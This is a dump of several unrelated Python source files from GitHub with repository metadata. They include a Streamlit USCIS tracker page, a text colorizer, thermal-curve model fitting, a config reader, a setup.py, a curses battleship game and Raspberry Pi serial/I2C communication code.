print(*[cups.popleft() for i in range(len(cups))])
print(f'Wasted litters of water: {wasted_water}')
|
[
"76039296+codelocks7@users.noreply.github.com"
] |
76039296+codelocks7@users.noreply.github.com
|
407664d79d63688fa1904fc5d1148aa5d8d4d2ce
|
d1b6ca6d310d646b64385ed87fed71ccec1cb6e3
|
/about_page.py
|
d42e1a4def82ac173833b9d7e2fa07e51909c25b
|
[] |
no_license
|
skaushikk/USCIS-tracker
|
7053d5af295632c8c1fa4ca0579cbf56e33497a4
|
1f4219c311f1a99a682fca6789e7922747338d2a
|
refs/heads/main
| 2023-04-24T18:08:03.714906
| 2021-05-09T02:16:55
| 2021-05-09T02:16:55
| 361,353,468
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,714
|
py
|
import streamlit as st
def app():
st.title('USCIS Case Status Analyzer')
st.subheader('Check, Analyze and Predict USCIS Application Status')
# st.markdown("<h3 style='text-align: right; color: gray;'>-- Kaushik Sirvole</h3>", unsafe_allow_html=True)
with st.beta_expander("ABOUT", expanded=True):
# st.subheader('ABOUT')
st.write('USCIS Case Status Tracker app is built to help, people who have a pending '
'application with the United States Citizenship and Immigration Services (USCIS)'
'by educating, tracking, predicting their case with respect to other similar '
'applications. Similar applications are defined as those of the same kind, from same locations'
'and applied during similar times')
st.write('The current indefinite uncertain timeline due to political climate, COVID protocols, '
'resulted in unprecedented strain on USCIS servicing capabilities and consequently piling on '
'extreme stress to the applicants with lives on hold waiting for the adjudication. ')
st.write('Furthermore, this app provides a platform for more broader, indepth analysis and prediction')
with st.beta_expander("DISCLAIMER", expanded=False):
st.write('The application does not store any user information at all. All the information provided is from '
'publicly available data.')
with st.beta_expander("KNOWLEDGEBASE", expanded=False):
st.write("The details on different types of forms, terminology can be found in the USCIS information pages"
"https://www.uscis.gov/tools/a-z-index")
# st.selectbox()
|
[
"skaushikk@gmail.com"
] |
skaushikk@gmail.com
|
dca0df86cf196077787b8351e77a52367efaf8ea
|
a0af94e54aaeaf0dfc373196c3bc7372926a7c7f
|
/colorize
|
aca3ecc24004252a087c462d6b1a71056603bbf5
|
[
"MIT"
] |
permissive
|
cheshirex/colorize
|
7170f3ff250009bc4ca40e7740498328b3bf1ab0
|
c95049c312a422023e48b8e1522c57b4c2913446
|
refs/heads/main
| 2023-01-07T05:58:04.019437
| 2020-11-04T10:27:57
| 2020-11-04T10:27:57
| 309,968,575
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,445
|
#!/usr/bin/env python
# Tool to colorize output based on regular expressions, designed to work both
# with ANSI escape sequences and with HTML color codes. Data to colorize is input
# on STDIN, and result is output on STDOUT
# Usage:
# colorize <ansi|html> <color config filename>
import sys
import re
html_escape_table = {
"&": "&",
'"': """,
"'": "'",
">": ">",
"<": "<"
}
def htmlEscape(text):
"""Produce entities within text."""
try:
result = '"".join(html_escape_table.get(c,c) for c in text)'
except SyntaxError:
print "HTML mode not supported prior to Python 2.4"
sys.exit(1)
return result
def printHtmlHeader():
print '''
<html>
<head>
<style text="text/css">
body {
font-family: Monaco,
"Bitstream Vera Sans Mono",
"Lucida Console",
Terminal,
monospace;
font-size: 14;
}
</style>
</head>
<body>
<pre>'''
def printHtmlFooter():
print '''
</pre>
</body>
</html>
'''
escape = '\033'
colors = {'black': {'ansi': {'begin': escape + '[0;30m', 'end': escape + '[0m'},
'html': {'begin': '<font color=\'black\'>', 'end': '</font>'}},
'red': {'ansi': {'begin': escape + '[0;31m', 'end': escape + '[0m'},
'html': {'begin': '<font color=\'red\'>', 'end': '</font>'}},
'green': {'ansi': {'begin': escape + '[0;32m', 'end': escape + '[0m'},
'html': {'begin': '<font color=\'green\'>', 'end': '</font>'}},
'yellow': {'ansi': {'begin': escape + '[0;33m', 'end': escape + '[0m'},
'html': {'begin': '<font color=\'#C9960C\'>', 'end': '</font>'}},
'blue': {'ansi': {'begin': escape + '[0;34m', 'end': escape + '[0m'},
'html': {'begin': '<font color=\'blue\'>', 'end': '</font>'}},
'purple': {'ansi': {'begin': escape + '[0;35m', 'end': escape + '[0m'},
'html': {'begin': '<font color=\'purple\'>', 'end': '</font>'}},
'cyan': {'ansi': {'begin': escape + '[0;36m', 'end': escape + '[0m'},
'html': {'begin': '<font color=\'cyan\'>', 'end': '</font>'}},
'white': {'ansi': {'begin': escape + '[0;37m', 'end': escape + '[0m'},
'html': {'begin': '<font color=\'white\'>', 'end': '</font>'}}}
if sys.argv[1] in ('html', 'ansi'):
format = sys.argv[1]
else:
sys.exit(-1)
rules = {}
# Read color regular expressions
configFile = open(sys.argv[2])
for line in configFile:
if line[0] == '#':
continue
# Read each line - first word is colour ID, rest of line is regular expression
color, regex = line.strip().split(None, 1)
rules[regex] = color
configFile.close()
if format == 'html':
printHtmlHeader()
for line in sys.stdin:
# Clean up Unicode characters
line = line.replace('\xe2\x80\x98', "'").replace('\xe2\x80\x99',"'")
for regex, color in rules.items():
if re.search(regex, line):
if format == 'html':
line = htmlEscape(line)
print colors[color][format]['begin'] + line.strip() + colors[color][format]['end']
break
else:
if format == 'html':
line = htmlEscape(line)
print line.strip()
if format == 'html':
printHtmlFooter()
|
[
"noreply@github.com"
] |
cheshirex.noreply@github.com
|
|
8e1418e4e26d871472531d0c334592b6736bee75
|
07f37b31c48ae80d32831fe6eb3f58b2e9f9a0f0
|
/tpcfit/models.py
|
872bf6829ff506949e0289d4396550c3a78be115
|
[] |
no_license
|
hjosullivan/CMEEProject
|
2dcf970f2be47b43c81b78ac9dc754ef96199663
|
ee3dc452d9d61734f41eff94e2f4d0d896ed0cbe
|
refs/heads/master
| 2022-08-26T12:49:52.615471
| 2019-08-29T14:31:41
| 2019-08-29T14:31:41
| 160,700,900
| 0
| 0
| null | 2022-08-23T17:33:45
| 2018-12-06T16:20:56
|
Python
|
UTF-8
|
Python
| false
| false
| 18,125
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
""" models.py contains all available mathematical models to be fitted to thermal performance curves.
NOTE: Currently only Sharpe-Schoolfield variants """
import numpy as np
from lmfit import minimize, Minimizer, Parameters
class ThermalModelsException(Exception):
""" General purpose exception generator for ThermalModels"""
def __init__(self, msg):
Exception.__init__(self)
self.msg = msg
def __str__(self):
return "{}".format(self.msg)
class ThermalModels(object):
""" Class containing thermal models for fitting """
# Set some useful class variables
# Bolzmann's constant
k = 8.617 * 10 ** (-5)
# Reference temperature (20 degrees C)
Tref = 283.15
# Set some useful error messages
_err_novals = ("Please supply input data for model fitting.")
_err_nonparam = ("Supplied parameters must be an instance of lmfit.parameter.Parameter or tpcfit.starting_parameters.StartParams")
_err_temperror = ("Temperature vector must be of type numpy.ndarray.")
_err_traiterror = ("Trait vector must be of type numpy.ndarray.")
_err_zero_neg_vals = ("Zero or negative values not accepted. Please supply positive values only.")
def __init__(self, temps=None, traits=None, fit_pars=None):
if temps is not None:
self.temps = temps
if not isinstance(temps, np.ndarray):
raise ThermalModelsException(self._err_temperror)
if self.temps is None:
raise ThermalModelsException(self._err_novals)
elif np.min(self.temps) < 0:
raise ThermalModelsException(self._err_temperror)
if traits is not None:
self.traits = traits
if not isinstance(traits, np.ndarray):
raise ThermalModelsException(self._err_traiterror)
if self.traits is None:
raise ThermalModelsException(self._err_novals)
elif np.min(self.traits) < 0:
raise ThermalModelsException(self._err_traiterror)
if fit_pars is not None:
self.fit_pars = fit_pars
if not isinstance(fit_pars, Parameters):
self.fit_pars = self.fit_pars.gauss_params
#raise ThermalModelsException(self._err_nonparam)
elif self.fit_pars is None:
raise ThermalModelsException(self._err_novals)
@classmethod
def set_Tref(cls, Tref_val):
""" Allow user to set their own reference temperature """
cls.Tref = Tref_val
class SharpeSchoolfieldFull(ThermalModels):
model_name = "sharpeschoolfull"
def __init__(self, temps, traits, fit_pars):
super().__init__(temps, traits, fit_pars)
self.ssf_model = self.fit_ssf(temps, traits, fit_pars)
if self.ssf_model is not None:
# Return fitted trait values
self.ssf_fits = self.ssf_fitted_vals(self.ssf_model)
# Return parameter estimates from the model
self.final_estimates = self.ssf_estimates(self.ssf_model)
# Return initial parameter values supplied to the model
self.initial_params = self.ssf_init_params(self.ssf_model)
# Return AIC score
self.AIC = self.ssf_aic(self.ssf_model)
def ssf_fcn2min(self, temps, traits, fit_pars):
""" Function to be minimized
Parameters
----------
temps: numpy array
Temperature array in Kelvin
traits: numpy array
Trait array
params: lmfit.parameter.Parameters
Dictionary of parameters to fit full schoolfield model
Returns
-------
ssf_fcn2min: callable
Fitting function to be called by the optimizer - producing an array of residuals (difference between model and data)
"""
# Set parameter values
B0 = self.fit_pars["B0"].value
E = self.fit_pars["E"].value
Eh = self.fit_pars["Eh"].value
El = self.fit_pars["El"].value
Th = self.fit_pars["Th"].value
Tl = self.fit_pars["Tl"].value
# Eh must be greater than Eh
if E >= Eh:
return 1e10
# TH must be greater than Tl
if Th < (Tl + 1):
Th = Tl + 1
# And Tl must be less than Th
if Tl > Th - 1:
Tl = Th - 1
model = np.log((B0 * np.exp(1)**((-E / self.k) * ((1 / self.temps) - (1 / self.Tref)))) / ((1 + (np.exp(1)**((El / self.k) * ((1 / Tl) - (1 / self.temps))))) + (np.exp(1)**((Eh / self.k) * ((1 / Th) - (1 / self.temps))))))
# Return residual array
return np.array(np.exp(model) - self.traits)
def ssf_fitted_vals(self, ssf_model):
""" Called by a fit model only: A function to estimate the trait value at a given temperature according
to the Sharpe-Schoolfield model
Parameters
----------
ssf_model: lmfit.MinimizerResult
Minimizer result of a successful fit
Returns
-------
ssf_fits: numpy array
Fitted trait values
"""
# Get best-fit model parameters
B0 = self.ssf_model.params["B0"].value
E = self.ssf_model.params["E"].value
Eh = self.ssf_model.params["Eh"].value
El = self.ssf_model.params["El"].value
Th = self.ssf_model.params["Th"].value
Tl = self.ssf_model.params["Tl"].value
# Define model
model = np.log((B0 * np.exp(1)**((-E / self.k) * ((1 / self.temps) - (1 / self.Tref)))) / ((1 + (np.exp(1)**((El / self.k) * ((1 / Tl) - (1 / self.temps))))) + (np.exp(1)**((Eh / self.k) * ((1 / Th) - (1 / self.temps))))))
# Get untransformed fitted values
self.ssf_fits = np.array(np.exp(model))
return self.ssf_fits
def fit_ssf(self, temps, traits, fit_pars):
""" Fitting function for schoolfield full model
Parameters
----------
fcn2min: callable
function to be minimized by the optimizer
params: Parameter object
Dictionary of parameters to fit full schoolfield model
temps: numpy array
Temperature array in Kelvin
traits: numpy array
Trait array
Returns
-------
ssf_model: lmfit.MinimizerResult
Model result object
"""
# Log trait values
self.traits = np.log(self.traits)
# Minimize model
try:
self.ssf_model = minimize(self.ssf_fcn2min, self.fit_pars, args=(self.temps, self.traits), xtol = 1e-12, ftol = 1e-12, maxfev = 100000)
except Exception:
return None
return self.ssf_model
def ssf_estimates(self, ssf_model):
""" Get parameter estimtes from the model
Parameters
----------
ssf_model : lmfit.MinimizerResult
A successful model result
Returns
-------
final_estimates: dict
Dictionary of final fitted parameters from the model
"""
self.final_estimates = self.ssf_model.params.valuesdict()
return self.final_estimates
def ssf_init_params(self, ssf_model):
""" Get parameter estimtes from the model
Parameters
----------
ssf_model : lmfit.MinimizerResult
A successful model result
Returns
-------
initial_params: dict
Dictionary of initial parameters supplied to the model
"""
self.initial_params = self.ssf_model.init_values
return self.initial_params
def ssf_aic(self,ssf_model):
""" Get model AIC score
Parameters
----------
ssf_model : lmfit.MinimizerResult
A successful model result
Returns
-------
AIC: int
AIC score from fitted model
"""
self.AIC = self.ssf_model.aic
return self.AIC
def __repr__(self):
pass
# readable representation of the object (for user)
def __str__(self):
pass
class SharpeSchoolfieldHigh(ThermalModels):
model_name = "sharpeschoolhigh"
def __init__(self, temps, traits, fit_pars):
super().__init__(temps, traits, fit_pars)
self.ssh_model = self.fit_ssh(temps, traits, fit_pars)
if self.ssh_model is not None:
# Return fitted trait values
self.ssh_fits = self.ssh_fitted_vals(self.ssh_model)
# Return parameter estimates from the model
self.final_estimates = self.ssh_estimates(self.ssh_model)
# Return initial parameter values supplied to the model
self.initial_params = self.ssh_init_params(self.ssh_model)
# Return AIC score
self.AIC = self.ssh_aic(self.ssh_model)
def ssh_fcn2min(self, temps, traits, fit_pars):
""" Function to be minimized
Parameters
----------
temps: numpy array
Temperature array in Kelvin
traits: numpy array
Trait array
params: lmfit.parameter.Parameters
Dictionary of parameters to fit full schoolfield model
Returns
-------
ssh_fcn2min: callable
Fitting function to be called by the optimizer - producing an array of residuals (difference between model and data)
"""
# Set parameter values
B0 = self.fit_pars["B0"].value
E = self.fit_pars["E"].value
Eh = self.fit_pars["Eh"].value
Th = self.fit_pars["Th"].value
# Eh must be greater than Eh
if E >= Eh:
return 1e10
model = np.log((B0 * np.exp(1)**((-E / self.k) * ((1 / self.temps) - (1 / self.Tref)))) / (1 + (np.exp(1)**((Eh / self.k) * ((1 / Th) - (1 / self.temps))))))
# Return residual array
return np.array(np.exp(model) - self.traits)
def ssf_fitted_vals(self, ssh_model):
""" Called by a fit model only: A function to estimate the trait value at a given temperature.
Parameters
----------
ssf_model: lmfit.MinimizerResult
Minimizer result of a successful fit
Returns
-------
ssh_fits: numpy array
Fitted trait values
"""
# Get best-fit model parameters
B0 = self.ssh_model.params["B0"].value
E = self.ssh_model.params["E"].value
Eh = self.ssh_model.params["Eh"].value
Th = self.ssh_model.params["Th"].value
# Define model
model = np.log((B0 * np.exp(1)**((-E / self.k) * ((1 / self.temps) - (1 / self.Tref)))) / (1 + (np.exp(1)**((Eh / self.k) * ((1 / Th) - (1 / self.temps))))))
# Get untransformed fitted values
self.ssh_fits = np.array(np.exp(model))
return self.ssh_fits
def fit_ssh(self, temps, traits, fit_pars):
""" Fitting function for schoolfield full model
Parameters
----------
fcn2min: callable
function to be minimized by the optimizer
params: Parameter object
Dictionary of parameters to fit full schoolfield model
temps: numpy array
Temperature array in Kelvin
traits: numpy array
Trait array
Returns
-------
ssf_model: lmfit.MinimizerResult
Model result object
"""
# Log trait values
self.traits = np.log(self.traits)
# Minimize model
try:
self.ssh_model = minimize(self.ssh_fcn2min, self.fit_pars, args=(self.temps, self.traits), xtol = 1e-12, ftol = 1e-12, maxfev = 100000)
except Exception:
return None
return self.ssh_model
def ssh_estimates(self, ssh_model):
""" Get parameter estimtes from the model
Parameters
----------
ssh_model : lmfit.MinimizerResult
A successful model result
Returns
-------
final_estimates: dict
Dictionary of final fitted parameters from the model
"""
self.final_estimates = self.ssh_model.params.valuesdict()
return self.final_estimates
def ssf_init_params(self, ssf_model):
""" Get parameter estimtes from the model
Parameters
----------
ssf_model : lmfit.MinimizerResult
A successful model result
Returns
-------
initial_params: dict
Dictionary of initial parameters supplied to the model
"""
self.initial_params = self.ssh_model.init_values
return self.initial_params
def ssf_aic(self, ssh_model):
""" Get model AIC score
Parameters
----------
ssf_model : lmfit.MinimizerResult
A successful model result
Returns
-------
AIC: int
AIC score from fitted model
"""
self.AIC = self.ssh_model.aic
return self.AIC
def __repr__(self):
pass
# readable representation of the object (for user)
def __str__(self):
pass
class SharpeSchoolfieldlow(ThermalModels):
model_name = "sharpeschoollow"
def __init__(self, temps, traits, fit_pars):
super().__init__(temps, traits, fit_pars)
self.ssl_model = self.fit_ssh(temps, traits, fit_pars)
if self.ssl_model is not None:
# Return fitted trait values
self.ssl_fits = self.ssl_fitted_vals(self.ssl_model)
# Return parameter estimates from the model
self.final_estimates = self.ssl_estimates(self.ssl_model)
# Return initial parameter values supplied to the model
self.initial_params = self.ssl_init_params(self.ssl_model)
# Return AIC score
self.AIC = self.ssh_aic(self.ssl_model)
def ssl_fcn2min(self, temps, traits, fit_pars):
""" Function to be minimized
Parameters
----------
temps: numpy array
Temperature array in Kelvin
traits: numpy array
Trait array
params: lmfit.parameter.Parameters
Dictionary of parameters to fit full schoolfield model
Returns
-------
ssl_fcn2min: callable
Fitting function to be called by the optimizer - producing an array of residuals (difference between model and data)
"""
# Set parameter values
B0 = self.fit_pars["B0"].value
E = self.fit_pars["E"].value
El = self.fit_pars["Eh"].value
Tl = self.fit_pars["Th"].value
model = np.log((B0 * np.exp(1)**((-E / self.k) * ((1 / self.temps) - (1 / self.Tref)))) / (1 + (np.exp(1)**((El / self.k) * ((1 / Tl) - (1 / self.temps))))))
# Return residual array
return np.array(np.exp(model) - self.traits)
def ssf_fitted_vals(self, ssl_model):
""" Called by a fit model only: A function to estimate the trait value at a given temperature.
Parameters
----------
ssl_model: lmfit.MinimizerResult
Minimizer result of a successful fit
Returns
-------
ssl_fits: numpy array
Fitted trait values
"""
# Get best-fit model parameters
B0 = self.ssh_model.params["B0"].value
E = self.ssh_model.params["E"].value
El = self.ssh_model.params["Eh"].value
Tl = self.ssh_model.params["Th"].value
# Define model
model = np.log((B0 * np.exp(1)**((-E / self.k) * ((1 / self.temps) - (1 / self.Tref)))) / (1 + (np.exp(1)**((El / self.k) * ((1 / Tl) - (1 / self.temps))))))
# Get untransformed fitted values
self.ssh_fits = np.array(np.exp(model))
return self.ssl_fits
def fit_ssh(self, temps, traits, fit_pars):
""" Fitting function for schoolfield full model
Parameters
----------
fcn2min: callable
function to be minimized by the optimizer
params: Parameter object
Dictionary of parameters to fit full schoolfield model
temps: numpy array
Temperature array in Kelvin
traits: numpy array
Trait array
Returns
-------
ssl_model: lmfit.MinimizerResult
Model result object
"""
# Log trait values
self.traits = np.log(self.traits)
# Minimize model
try:
self.ssl_model = minimize(self.ssl_fcn2min, self.fit_pars, args=(self.temps, self.traits), xtol = 1e-12, ftol = 1e-12, maxfev = 100000)
except Exception:
return None
return self.ssl_model
def ssh_estimates(self, ssl_model):
""" Get parameter estimtes from the model
Parameters
----------
ssh_model : lmfit.MinimizerResult
A successful model result
Returns
-------
final_estimates: dict
Dictionary of final fitted parameters from the model
"""
self.final_estimates = self.ssl_model.params.valuesdict()
return self.final_estimates
def ssf_init_params(self, ssl_model):
""" Get parameter estimtes from the model
Parameters
----------
ssl_model : lmfit.MinimizerResult
A successful model result
Returns
-------
initial_params: dict
Dictionary of initial parameters supplied to the model
"""
self.initial_params = self.ssl_model.init_values
return self.initial_params
def ssf_aic(self, ssl_model):
""" Get model AIC score
Parameters
----------
ssl_model : lmfit.MinimizerResult
A successful model result
Returns
-------
AIC: int
AIC score from fitted model
"""
self.AIC = self.ssl_model.aic
return self.AIC
def __repr__(self):
pass
# readable representation of the object (for user)
def __str__(self):
pass
|
[
"noreply@github.com"
] |
hjosullivan.noreply@github.com
|
2fb3b208f8422d53eb69c09474b9e669b7f9db6b
|
b30def8f44060e373dba0de9facb62964224d285
|
/config.py
|
97dc08977f3cd997b513264801ccb5c7cf5c2f98
|
[] |
no_license
|
saakash309/Data-Processing-
|
1136e2612b7068d9fef695587070e2b98ebb7ff8
|
7857de4654c611689b422d8d6c88e61ba498a4c0
|
refs/heads/main
| 2023-09-04T20:30:49.225368
| 2021-11-23T06:04:45
| 2021-11-23T06:04:45
| 430,939,150
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,185
|
py
|
from configparser import ConfigParser
from pprint import pprint
#reading the config file
class Data():
'''
Return a set of coulmns from a config file that will be displayed
Path = path of the configuration file
'''
def __init__(self,path) -> None:
self.path = path
def fields(self):
config = ConfigParser()
config.read(self.path)
#finding the fields that needs to be displayed
keys = []
if 'Idnumber' not in (config['Fields'])or config['Fields']['Idnumber']=='no':
keys.append('IDNUMBER')
#print(config.options('Fields'))
for key,value in config.items(config.sections()[0]):
if value == 'yes':
keys.append(str(key).upper().strip())
return keys
def fpath(self):
config = ConfigParser()
config.read(self.path)
for key,value in config.items(config.sections()[-1]):
#print(key,value)
if key == 'PathtoDataFile'.lower():
#print(value)
return value
else:
return None
#print(Data('config.ini').fpath())
|
[
"noreply@github.com"
] |
saakash309.noreply@github.com
|
9c49e6ca3bd2a42e53334ed4c4c2dee500c889b3
|
ee1db6398a73882e750c86257b43390c5ec2a654
|
/fpm/setup.py
|
84cf025ee77323c37d5387470fd713ac4504e1a1
|
[
"MIT"
] |
permissive
|
gscigala/packet-generation
|
c795131e202e59d16fc99eca61008b850df9c6c5
|
137b2853e57756a9ade1af2e95c8b2839f401121
|
refs/heads/master
| 2021-01-23T03:12:48.984559
| 2017-04-04T13:50:46
| 2017-04-04T13:50:46
| 86,057,836
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,869
|
py
|
"""A setuptools based setup module.
See:
https://packaging.python.org/en/latest/distributing.html
https://github.com/pypa/sampleproject
"""
# Always prefer setuptools over distutils
from setuptools import setup, find_packages
# To use a consistent encoding
from codecs import open
from os import path
here = path.abspath(path.dirname(__file__))
# Get the long description from the README file
with open(path.join(here, 'README.rst'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='test_sample',
# Versions should comply with PEP440. For a discussion on single-sourcing
# the version across setup.py and the project code, see
# https://packaging.python.org/en/latest/single_source_version.html
version='1.0.0',
description='A GStreamer test video project',
long_description=long_description,
# The project's main homepage.
url='https://github.com/gscigala/packet-generation',
# Author details
author='Guillaume Scigala',
author_email='guillaume@scigala.fr',
# Choose your license
license='MIT',
# See https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
'Development Status :: 3 - Alpha',
# Indicate who your project is intended for
'Intended Audience :: Developers',
'Topic :: Software Development :: Build Tools',
# Pick your license as you wish (should match "license" above)
'License :: OSI Approved :: MIT License',
# Specify the Python versions you support here. In particular, ensure
# that you indicate whether you support Python 2, Python 3 or both.
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7'
],
# What does your project relate to?
keywords='sample setuptools development streaming',
# You can just specify the packages manually here if your project is
# simple. Or you can use find_packages().
packages=find_packages(exclude=['contrib', 'docs', 'tests']),
# Alternatively, if you want to distribute just a my_module.py, uncomment
# this:
# py_modules=["my_module"],
# List run-time dependencies here. These will be installed by pip when
# your project is installed. For an analysis of "install_requires" vs pip's
# requirements files see:
# https://packaging.python.org/en/latest/requirements.html
#install_requires=['peppercorn'],
# List additional groups of dependencies here (e.g. development
# dependencies). You can install these using the following syntax,
# for example:
# $ pip install -e .[dev,test]
extras_require={
#'dev': ['check-manifest'],
#'test': ['coverage'],
},
# If there are data files included in your packages that need to be
# installed, specify them here. If using Python 2.6 or less, then these
# have to be included in MANIFEST.in as well.
package_data={
'test_sample': [
'data/logging.conf'
],
},
# Although 'package_data' is the preferred approach, in some case you may
# need to place data files outside of your packages. See:
# http://docs.python.org/3.4/distutils/setupscript.html#installing-additional-files # noqa
# In this case, 'data_file' will be installed into '<sys.prefix>/my_data'
#data_files=[('my_data', ['data/data_file'])],
# To provide executable scripts, use entry points in preference to the
# "scripts" keyword. Entry points provide cross-platform support and allow
# pip to create the appropriate form of executable for the target platform.
entry_points={
'console_scripts': [
'testSample=test_sample.__main__:main',
],
},
)
|
[
"guillaume.scigala@smile.fr"
] |
guillaume.scigala@smile.fr
|
65c81b2c37dfa24b81ae8c97d1e1d2f37c8af03a
|
b926393a43850799f57b59202796d128c5b611ab
|
/main.py
|
162002374fe6c83445e2d99937a3a90f3ac936c1
|
[] |
no_license
|
apustovitin/sea-battle
|
0435e697b2143e80fdd04cbabbd5a51f18536c0c
|
2546d9f296a7bd3a8e84af3bd0439b21180d27f6
|
refs/heads/master
| 2023-01-18T18:03:27.210594
| 2020-12-01T14:09:33
| 2020-12-01T14:09:33
| 317,479,808
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,482
|
py
|
import curses
import board_image
from game import Game
import random
def moves_loop(game):
if random.choice([False, True]):
is_break, is_restart = game.computer_move()
if is_break or is_restart:
return is_break, is_restart
while True:
is_break, is_restart = game.player_move()
if is_break or is_restart:
return is_break, is_restart
is_break, is_restart = game.computer_move()
if is_break or is_restart:
return is_break, is_restart
def game_loop(stdscr):
unknown_ships = [1, 1, 1, 1, 2, 2, 2, 3, 3, 4]
while True:
stdscr.clear()
computer_board = board_image.BoardImage()
player_board = board_image.BoardImage()
player_board_image = board_image.BoardImage()
game = Game(stdscr, ".\screen_layout.txt", unknown_ships, computer_board, player_board, player_board_image)
game.place_computer_ships()
game.print_screen_layout()
is_break, is_restart = game.place_player_ships()
if is_break:
break
if is_restart:
continue
is_break, is_restart = moves_loop(game)
if is_break:
break
if is_restart:
continue
def main():
stdscr = curses.initscr()
stdscr.clear()
curses.noecho()
curses.cbreak()
curses.curs_set(0)
stdscr.keypad(True)
game_loop(stdscr)
curses.endwin()
if __name__ == '__main__':
main()
|
[
"apustovitin@gmail.com"
] |
apustovitin@gmail.com
|
fa4752f737897f35e16ed0b252a1230746f6ee6d
|
7ff3ec2f2a6e093a63f09a30ec985c3564c79159
|
/Demo_2/Raspberry_Pi/Threading/Pi_Comms_Multi_Threading.py
|
7b0e7ee2d2290889fa410ff3a3ec584c98dfcb2e
|
[] |
no_license
|
lkseattle/SEED_FALL_2020_T3-1
|
468dafe4193a6663d5dc6fa09ea7cfc9953f4455
|
b7e026fee1d6f77f62fd84547beebac3b76c2532
|
refs/heads/master
| 2023-01-10T21:47:24.578863
| 2020-11-10T09:34:58
| 2020-11-10T09:34:58
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,016
|
py
|
#Cameron Kramr
#10/09/2020
#EENG 350
#Section A
#Computer Vision
#NOTE, this module requires pygame to be installed in order to run
#The code in this file deals with communcicating with other devices outside of the raspberry pi.
import multiprocessing as mp
import termios
import os
import sys
from enum import Enum
from enum import IntEnum
import time
import serial
import board
import busio
import adafruit_character_lcd.character_lcd_rgb_i2c as character_lcd
from smbus2 import SMBus
import math
import ctypes
#import spidev
#Create the valid commands for controlling thread operation
class I2C_CMD(IntEnum):
LCD_CLR_MSG = 1
WRITE_ARDU = 2
FETCH_ANGLE = 3
class ARDU_CMD(IntEnum):
TARGET = 250
SEND = 1
RECEIVE = 2
#Main Serial handler thread deals with Serial nonsense.
def Serial_Handler(input_pipe, file = '/dev/ttyACM0', baud = 250000):
#Initialize Serial object
ser = serial.Serial(file, baud)
FPS = 100
data2 = ""
Start = time.time()
#time.sleep(2) #might need it so 'ser' can work properly
#Initialize variables
data = [0,0,0]
while (True):
#Data shape:
#[command, [magnitude, angle]]
#Non-blocking read of pipe waiting for input
try:
if(input_pipe.poll()):
data = input_pipe.recv()
while(ser.inWaiting()>0):
data2 += ser.readline().decode('utf-8')
#print("Arduino Data:")
#print(data2)
except:
print("Serial Error")
#print("Looping")
if(data[0] == ARDU_CMD.SEND): #Clear LCD and send it a string to display
try:
#ser.write((' '.join([str(item) for item in data[1]]
for i in data[1]:
if(i != '\n'):
ser.write(i.encode())
#print(i)
#print("Sent Ardu:" + str(data[1]))
#pass
except:
print("Something's wrong with sending Serial Data!")
if(data2 != ""): #if we need to get the position from arduino, this if statement
#will do it. Feel free to alter "get_position" to whatever you want.
try:
#data2 = ser.readline().decode('utf-8').rstrip() #gets data from arduino
input_pipe.send(data2)
data2 = ""
pass
except:
print("Something's wrong with getting Serial Data!")
#Clear data
data[0] = 0
#Frame lock arduino
while(time.time() - Start < 1/FPS):
pass
#Main I2C handler thread deals with I2C nonsense.
def I2C_Handler(input_pipe, size, address, color = [255, 0, 0]):
#Initialize I2C objects
i2c_bus = busio.I2C(board.SCL, board.SDA)
lcd = character_lcd.Character_LCD_RGB_I2C(i2c_bus, size[1], size[0])
lcd.clear()
#Initialize SMbus object
sm_bus = SMBus(1)
#Initialize variables
I2C_FPS = 100 #Frame rate control for thread to conserve resources
I2C_Start = 0
data = [0,0]
data_in = ctypes.c_int8
#Initialize LCD screen
lcd.clear()
lcd.color = color
lcd.message = "Init LCD Handler Done ;)"
while(True):
#Record time
I2C_Start = time.time()
#Data shape:
#[cmd, content]
#Non-blocking read of pipe waiting for input
if(input_pipe.poll()):
data = input_pipe.recv()
#Switch on command portion of data to figure out what to do
if(data[0] == I2C_CMD.LCD_CLR_MSG): #Clear LCD and send it a string to display
try:
#time.sleep(0.1)
lcd.clear()
lcd.message = str(data[1])
pass
except:
print("SM Bus Error!")
elif(data[0] == I2C_CMD.WRITE_ARDU): #Write to the arduino #not needed anymore?
try:
print(data[1])
sm_bus.write_byte_data(address, 0, int(data[1]))
except:
print("SM Bus Error!")
sm_bus = SMBus(1)
elif(data[0] == I2C_CMD.FETCH_ANGLE): #Fetch the angle from the arduino #not needed anymore?
#print(sm_bus.read_byte_data(address, 0))
try:
#Need to preserve the sign to make this sensible, use ctypes for that
data_in = ctypes.c_int8(sm_bus.read_byte_data(address, 0))
#Convert data in from byte to degree angle
data_in = data_in.value/128*180
#Send angle down pipe
input_pipe.send(data_in)
except:
print("SM Bus Error!")
#Clear data
data[0] = 0
#print("Sleep Time: " + str(max(1/I2C_FPS - (time.time() - I2C_Start),0)))
#Frame lock the thread to preserve resources
time.sleep(max(1/I2C_FPS - (time.time() - I2C_Start),0))
#print("I2C_FPS: " + str(int(1/(time.time() - I2C_Start))))
if __name__== "__main__":
Serial_pipe_1, Serial_pipe_2 = mp.Pipe(duplex = True)
comms = mp.Process(target = Serial_Handler, args=(Serial_pipe_2,))
comms.start()
Serial_pipe_1.send([ARDU_CMD.SEND, 123,456])
Serial_pipe_1.send([ARDU_CMD.SEND, 456,123])
Serial_pipe_1.send([ARDU_CMD.SEND, 1453,2345])
Serial_pipe_1.send([ARDU_CMD.RECEIVE, 1453,2345])
Serial_pipe_1.send([ARDU_CMD.RECEIVE, 1453,2345])
Serial_pipe_1.send([ARDU_CMD.RECEIVE, 1453,2345])
Serial_pipe_1.send([ARDU_CMD.RECEIVE, 1453,2345])
Serial_pipe_1.send([ARDU_CMD.RECEIVE, 1453,2345])
Serial_pipe_1.send([ARDU_CMD.RECEIVE, 1453,2345])
choar = input()
|
[
"cameronkramr@mines.edu"
] |
